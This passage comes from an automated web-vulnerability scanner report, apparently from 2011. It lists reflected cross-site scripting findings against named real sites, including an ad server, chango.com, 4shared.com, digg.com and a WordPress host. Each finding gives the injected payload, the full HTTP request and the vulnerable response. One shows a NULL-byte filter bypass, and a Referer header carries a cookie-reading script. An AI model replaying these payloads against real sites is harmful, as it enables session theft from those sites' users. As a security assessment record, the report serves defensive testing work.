Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12c6f"-alert(1)-"d6a3c5a4495 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This response is the tag that publisher pages load; it appends a <script> element whose src is /adServer/GetInvite2.aspx with the same parameters, so a parameter injected here is reflected once in this script (inside the s.src string) and again by GetInvite2.aspx (issues 3.127 to 3.133).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=177784&siteID=glamcom&creativeID=1467968&placementID=1248525&adexpansion=0&click=0&12c6f"-alert(1)-"d6a3c5a4495=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 634
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2648=178074,178074; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178074=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2648=4%2f20%2f2011+9%3a42%3a49+PM; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2648=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 21 Apr 2011 01:57:30 GMT
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:57:30 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='fun
...[SNIP]...
IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&12c6f"-alert(1)-"d6a3c5a4495=1&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968";document.getElementsByTagName('head')[0].appendChild(s);}})();

3.136. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b3c4'%3balert(1)//80bce15156d was submitted in the admeld_adprovider_id parameter. This input was echoed as 4b3c4';alert(1)//80bce15156d in the application's response: the server URL-decodes the value before reflecting it, so the %3b arrives as a semicolon that terminates the (new Image()).src assignment, and the trailing // comments out the remainder of the line, including the closing quotation mark.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=3334b3c4'%3balert(1)//80bce15156d&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "35a6a52235cb36ef51ca06ff2564423a92664585"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=3334b3c4';alert(1)//80bce15156d&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe';

3.137. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into the HTML document as plain text between tags. The payload 8f191<script>alert(1)</script>b1bf9d074e0 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=8f191<script>alert(1)</script>b1bf9d074e0 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 141
Server: Chango RTB Server
Etag: "92ae39ffdbe8186715f3ce9a39b5b7c61d16400a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='8f191<script>alert(1)</script>b1bf9d074e0?admeld_adprovider_id=333&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe';

3.138. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f5da'%3balert(1)//729a3bd1e19 was submitted in the admeld_callback parameter. This input was echoed as 2f5da';alert(1)//729a3bd1e19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match2f5da'%3balert(1)//729a3bd1e19 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "5461dfc48519a6013147870fa767d12e5ce5b739"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match2f5da';alert(1)//729a3bd1e19?admeld_adprovider_id=333&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe';

3.139. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc305.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b49ee"-alert(1)-"5c431f0ee83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mainb49ee"-alert(1)-"5c431f0ee83/upload.jsp HTTP/1.1
Host: dc305.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /mainb49ee&quot;-alert(1)-&quot;5c431f0ee83/upload.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 19:45:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc305.4shared.com/mainb49ee"-alert(1)-"5c431f0ee83/upload.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.140. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc305.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85e5"-alert(1)-"9824e0eb5f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/upload.jspa85e5"-alert(1)-"9824e0eb5f7 HTTP/1.1
Host: dc305.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main/upload.jspa85e5&quot;-alert(1)-&quot;9824e0eb5f7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 19:46:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc305.4shared.com/main/upload.jspa85e5"-alert(1)-"9824e0eb5f7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.141. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc308.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46541"-alert(1)-"704b9402c2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main46541"-alert(1)-"704b9402c2d/upload.jsp HTTP/1.1
Host: dc308.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main46541&quot;-alert(1)-&quot;704b9402c2d/upload.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:12:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc308.4shared.com/main46541"-alert(1)-"704b9402c2d/upload.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.142. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc308.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7371"-alert(1)-"109e745b72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/upload.jspa7371"-alert(1)-"109e745b72 HTTP/1.1
Host: dc308.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main/upload.jspa7371&quot;-alert(1)-&quot;109e745b72
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:12:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc308.4shared.com/main/upload.jspa7371"-alert(1)-"109e745b72";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.143. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e8cb0"><script>alert(1)</script>eee6eb58e9b was submitted in the REST URL parameter 1. This input was echoed as e8cb0"><script>alert(1)</script>eee6eb58e9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00e8cb0"><script>alert(1)</script>eee6eb58e9b HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:59:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2107412045744832512%3A187; expires=Sun, 27-Feb-2011 01:59:47 GMT; path=/; domain=digg.com
Set-Cookie: d=8bfb598c2877d172a9ca2cfcac5aad764d4f0bf5a31a5a261d3ab41be1d8a5f8; expires=Thu, 25-Feb-2021 12:07:27 GMT; path=/; domain=.digg.com
X-Digg-Time: D=260640 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00e8cb0"><script>alert(1)</script>eee6eb58e9b.rss">
...[SNIP]...

3.144. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2828"><script>alert(1)</script>eab5008b54d was submitted in the REST URL parameter 1. This input was echoed as e2828\"><script>alert(1)</script>eab5008b54d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente2828"><script>alert(1)</script>eab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digibond.wpengine.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:10:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:10:10 GMT
Cache-Control: max-age=86400
X-Varnish: 1668613514
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.com/wp-contente2828\"><script>alert(1)</script>eab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=cbba07f9e4">
...[SNIP]...

3.145. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1648a"><script>alert(1)</script>480ef64af3a was submitted in the REST URL parameter 5. This input was echoed as 1648a\"><script>alert(1)</script>480ef64af3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icallist.css1648a"><script>alert(1)</script>480ef64af3a?ver=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digibond.wpengine.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:10:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=b35e1fa86201292c876a56cd670935a8; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:10:25 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css1648a\"><script>alert(1)</script>480ef64af3a?ver=1&amp;_login=8941e066cb">
...[SNIP]...

3.146. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c916"><script>alert(1)</script>97b02068444 was submitted in the REST URL parameter 1. This input was echoed as 1c916\"><script>alert(1)</script>97b02068444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1c916"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602164
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content1c916\"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=d8531f58ad">
...[SNIP]...

3.147. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77cc0"><script>alert(1)</script>a500ca9f17c was submitted in the REST URL parameter 2. This input was echoed as 77cc0\"><script>alert(1)</script>a500ca9f17c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins77cc0"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604642
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins77cc0\"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=6bb0606984">
...[SNIP]...

3.148. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c461c"><script>alert(1)</script>81ebd71ba86 was submitted in the REST URL parameter 5. This input was echoed as c461c\"><script>alert(1)</script>81ebd71ba86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c"><script>alert(1)</script>81ebd71ba86?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
